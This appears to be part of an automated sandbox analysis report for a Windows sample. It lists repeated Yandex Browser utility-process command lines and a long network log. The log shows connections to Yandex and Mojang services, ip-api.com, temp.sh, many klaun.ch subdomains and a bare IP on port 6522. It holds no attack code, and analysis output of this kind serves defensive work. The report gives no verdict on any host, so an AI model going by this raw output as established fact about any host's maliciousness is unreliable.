"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=7108,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=7264 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=2744,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=7500 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=7120,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=7552 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=7792,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=7692 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=6368,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=7932 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=7132,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=8072 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=6704,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=8240 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=8380,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=8264 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=7112,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=8512 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=6284,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=8676 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=ru --service-sandbox-type=none --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Утилиты Windows" --field-trial-handle=4828,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5892 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=ru --service-sandbox-type=none --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Утилиты Windows" --field-trial-handle=4368,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4392 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=ru --service-sandbox-type=service --user-id=0805d991-6e7d-4048-beee-e5c45536178d --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Распаковщик файлов" --field-trial-handle=4676,i,16258775396391445102,15492408051929202923,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4636 --brver=24.6.0.1878 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 temp.sh udp
FR 51.91.79.17:443 temp.sh tcp
FR 51.91.79.17:443 temp.sh tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 17.79.91.51.in-addr.arpa udp
US 8.8.8.8:53 171.101.63.23.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 api.klaun.ch udp
US 104.26.10.58:80 api.klaun.ch tcp
US 8.8.8.8:53 58.10.26.104.in-addr.arpa udp
US 8.8.8.8:53 download.yandex.ru udp
RU 5.45.205.242:80 download.yandex.ru tcp
US 8.8.8.8:53 cachev2-ams03.cdn.yandex.net udp
NL 5.45.247.53:80 cachev2-ams03.cdn.yandex.net tcp
US 8.8.8.8:53 242.205.45.5.in-addr.arpa udp
US 8.8.8.8:53 53.247.45.5.in-addr.arpa udp
US 8.8.8.8:53 repos.klaun.ch udp
US 104.26.11.58:80 repos.klaun.ch tcp
RU 5.45.205.242:80 download.yandex.ru tcp
US 8.8.8.8:53 cachev2-kiv01.cdn.yandex.net udp
RU 5.45.192.183:80 cachev2-kiv01.cdn.yandex.net tcp
US 8.8.8.8:53 downloader.yandex.net udp
RU 5.45.205.242:80 downloader.yandex.net tcp
US 8.8.8.8:53 cachev2-ams01.cdn.yandex.net udp
NL 5.45.247.51:80 cachev2-ams01.cdn.yandex.net tcp
US 8.8.8.8:53 58.11.26.104.in-addr.arpa udp
US 8.8.8.8:53 183.192.45.5.in-addr.arpa udp
US 8.8.8.8:53 51.247.45.5.in-addr.arpa udp
US 8.8.8.8:53 226.20.18.104.in-addr.arpa udp
US 8.8.8.8:53 dl.klaun.ch udp
US 172.67.69.202:80 dl.klaun.ch tcp
US 8.8.8.8:53 202.69.67.172.in-addr.arpa udp
US 8.8.8.8:53 161.19.199.152.in-addr.arpa udp
US 8.8.8.8:53 clck.yandex.ru udp
RU 87.250.251.14:80 clck.yandex.ru tcp
US 8.8.8.8:53 14.251.250.87.in-addr.arpa udp
FR 88.168.211.65:6522 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 65.211.168.88.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
RU 87.250.251.14:80 clck.yandex.ru tcp
RU 77.88.21.14:80 clck.yandex.ru tcp
US 8.8.8.8:53 soft.export.yandex.ru udp
RU 87.250.254.20:80 soft.export.yandex.ru tcp
US 8.8.8.8:53 14.21.88.77.in-addr.arpa udp
US 8.8.8.8:53 20.254.250.87.in-addr.arpa udp
RU 5.45.205.242:80 downloader.yandex.net tcp
NL 5.45.247.53:80 cachev2-ams03.cdn.yandex.net tcp
RU 87.250.251.14:80 clck.yandex.ru tcp
US 8.8.8.8:53 api.browser.yandex.net udp
US 8.8.8.8:53 api.browser.yandex.ru udp
US 8.8.8.8:53 download.cdn.yandex.net udp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 5.45.205.242:443 download.cdn.yandex.net tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 8.8.8.8:53 234.193.180.213.in-addr.arpa udp
US 8.8.8.8:53 cachev2-kiv03.cdn.yandex.net udp
RU 5.45.192.185:443 cachev2-kiv03.cdn.yandex.net tcp
US 8.8.8.8:53 185.192.45.5.in-addr.arpa udp
US 8.8.8.8:53 api.klaun.ch udp
US 104.26.11.58:80 api.klaun.ch tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 104.26.11.58:80 api.klaun.ch tcp
US 104.26.11.58:80 api.klaun.ch tcp
US 104.26.11.58:80 api.klaun.ch tcp
US 8.8.8.8:53 repos.klaun.ch udp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
US 172.67.69.202:443 repos.klaun.ch tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 104.26.11.58:80 repos.klaun.ch tcp
US 172.67.69.202:80 repos.klaun.ch tcp
US 104.26.11.58:80 repos.klaun.ch tcp
US 104.26.11.58:80 repos.klaun.ch tcp
US 8.8.8.8:53 cf.klaun.ch udp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:80 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 8.8.8.8:53 fabric.klaun.ch udp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
FR 88.168.211.65:6522 tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 104.26.11.58:80 fabric.klaun.ch tcp
US 104.26.11.58:443 fabric.klaun.ch tcp
US 8.8.8.8:53 quilt.klaun.ch udp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:443 quilt.klaun.ch tcp
US 104.26.11.58:80 quilt.klaun.ch tcp
US 104.26.11.58:80 quilt.klaun.ch tcp
US 104.26.11.58:80 quilt.klaun.ch tcp
US 8.8.8.8:53 api.mojang.com udp
US 13.107.246.64:443 api.mojang.com tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 8.8.8.8:53 storage.ape.yandex.net udp
US 13.107.246.64:443 api.mojang.com tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 87.250.251.66:443 storage.ape.yandex.net tcp
US 13.107.246.64:443 api.mojang.com tcp
US 13.107.246.64:443 api.mojang.com tcp
US 8.8.8.8:53 sba.yandex.net udp
US 8.8.8.8:53 sba.yandex.net udp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 sovetnik.market.yandex.ru udp
US 8.8.8.8:53 sovetnik.market.yandex.ru udp
US 8.8.8.8:53 browser.yandex.ru udp
US 8.8.8.8:53 browser.yandex.ru udp
GB 216.58.204.67:443 update.googleapis.com tcp
RU 213.180.204.232:443 sba.yandex.net tcp
RU 93.158.134.121:443 browser.yandex.ru tcp
US 8.8.8.8:53 api.browser.yandex.net udp
US 8.8.8.8:53 api.browser.yandex.net udp
RU 213.180.193.234:443 api.browser.yandex.net tcp
US 8.8.8.8:53 storage.ape.yandex.net udp
US 8.8.8.8:53 storage.ape.yandex.net udp
RU 213.180.204.232:443 sba.yandex.net tcp
US 8.8.8.8:53 api.browser.yandex.ru udp
US 8.8.8.8:53 api.browser.yandex.ru udp
RU 87.250.251.66:443 storage.ape.yandex.net tcp
US 8.8.8.8:53 browser-resources.s3.yandex.net udp
US 8.8.8.8:53 browser-resources.s3.yandex.net udp
RU 93.158.134.158:443 browser-resources.s3.yandex.net tcp
RU 87.250.251.66:443 storage.ape.yandex.net tcp
US 8.8.8.8:53 browser-resources.s3.yandex.net udp
US 8.8.8.8:53 browser-resources.s3.yandex.net udp
US 8.8.8.8:53 sovetnik.market.yandex.ru udp
RU 87.250.250.41:443 sovetnik.market.yandex.ru tcp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 232.204.180.213.in-addr.arpa udp
US 8.8.8.8:53 121.134.158.93.in-addr.arpa udp
US 8.8.8.8:53 123.35.104.34.in-addr.arpa udp
US 8.8.8.8:53 158.134.158.93.in-addr.arpa udp
RU 213.180.204.232:443 sba.yandex.net tcp
US 8.8.8.8:53 cdnrepfu6rku5qba3zpu.svc.cdn.yandex.net udp
US 8.8.8.8:53 cdnrepfu6rku5qba3zpu.svc.cdn.yandex.net udp
RU 37.9.64.225:443 cdnrepfu6rku5qba3zpu.svc.cdn.yandex.net tcp
RU 93.158.134.121:443 browser.yandex.ru tcp
US 8.8.8.8:53 yastatic.net udp
US 8.8.8.8:53 yastatic.net udp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
US 8.8.8.8:53 webntp.yandex.ru udp
US 8.8.8.8:53 webntp.yandex.ru udp
US 8.8.8.8:53 yandex.ru udp
US 8.8.8.8:53 yandex.ru udp
US 8.8.8.8:53 browser-resources.s3.yandex.net udp
US 8.8.8.8:53 browser-resources.s3.yandex.net udp
RU 77.88.44.55:443 yandex.ru tcp
RU 93.158.134.158:443 browser-resources.s3.yandex.net tcp
RU 93.158.134.158:443 browser-resources.s3.yandex.net tcp
RU 93.158.134.158:443 browser-resources.s3.yandex.net tcp
RU 213.180.204.196:443 webntp.yandex.ru tcp
US 8.8.8.8:53 66.251.250.87.in-addr.arpa udp
US 8.8.8.8:53 41.250.250.87.in-addr.arpa udp
US 8.8.8.8:53 225.64.9.37.in-addr.arpa udp
US 8.8.8.8:53 217.131.154.178.in-addr.arpa udp
US 8.8.8.8:53 mc.yandex.ru udp
US 8.8.8.8:53 mc.yandex.ru udp
RU 93.158.134.119:443 mc.yandex.ru tcp
US 8.8.8.8:53 sessionserver.mojang.com udp
US 13.107.246.64:443 sessionserver.mojang.com tcp
US 8.8.8.8:53 uid.yandex.ru udp
US 8.8.8.8:53 uid.yandex.ru udp
US 8.8.8.8:53 api.browser.yandex.ru udp
US 8.8.8.8:53 api.browser.yandex.ru udp
US 8.8.8.8:53 sso.passport.yandex.ru udp
US 8.8.8.8:53 sso.passport.yandex.ru udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 55.44.88.77.in-addr.arpa udp
US 8.8.8.8:53 119.134.158.93.in-addr.arpa udp
US 8.8.8.8:53 196.204.180.213.in-addr.arpa udp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 87.250.254.216:443 uid.yandex.ru tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
US 8.8.8.8:443 dns.google tcp
RU 93.158.134.144:443 sso.passport.yandex.ru tcp
RU 93.158.134.144:443 sso.passport.yandex.ru tcp
US 8.8.8.8:443 dns.google udp
RU 62.217.160.14:443 tcp
RU 93.158.134.144:443 sso.passport.yandex.ru tcp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 8.8.8.8:53 216.254.250.87.in-addr.arpa udp
US 8.8.8.8:53 144.134.158.93.in-addr.arpa udp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 8.8.8.8:53 14.160.217.62.in-addr.arpa udp
RU 5.255.255.242:443 tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 8.8.8.8:53 242.255.255.5.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
RU 178.154.131.215:443 yastatic.net tcp
RU 77.88.21.37:443 tcp
RU 213.180.204.158:443 tcp
RU 213.180.204.158:443 tcp
RU 213.180.204.158:443 tcp
RU 213.180.204.158:443 tcp
RU 213.180.204.158:443 tcp
RU 213.180.204.158:443 tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 8.8.8.8:443 dns.google udp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 8.8.8.8:53 215.131.154.178.in-addr.arpa udp
US 8.8.8.8:53 37.21.88.77.in-addr.arpa udp
US 8.8.8.8:53 158.204.180.213.in-addr.arpa udp
RU 77.88.55.88:443 yandex.ru tcp
US 8.8.8.8:53 88.55.88.77.in-addr.arpa udp

Files

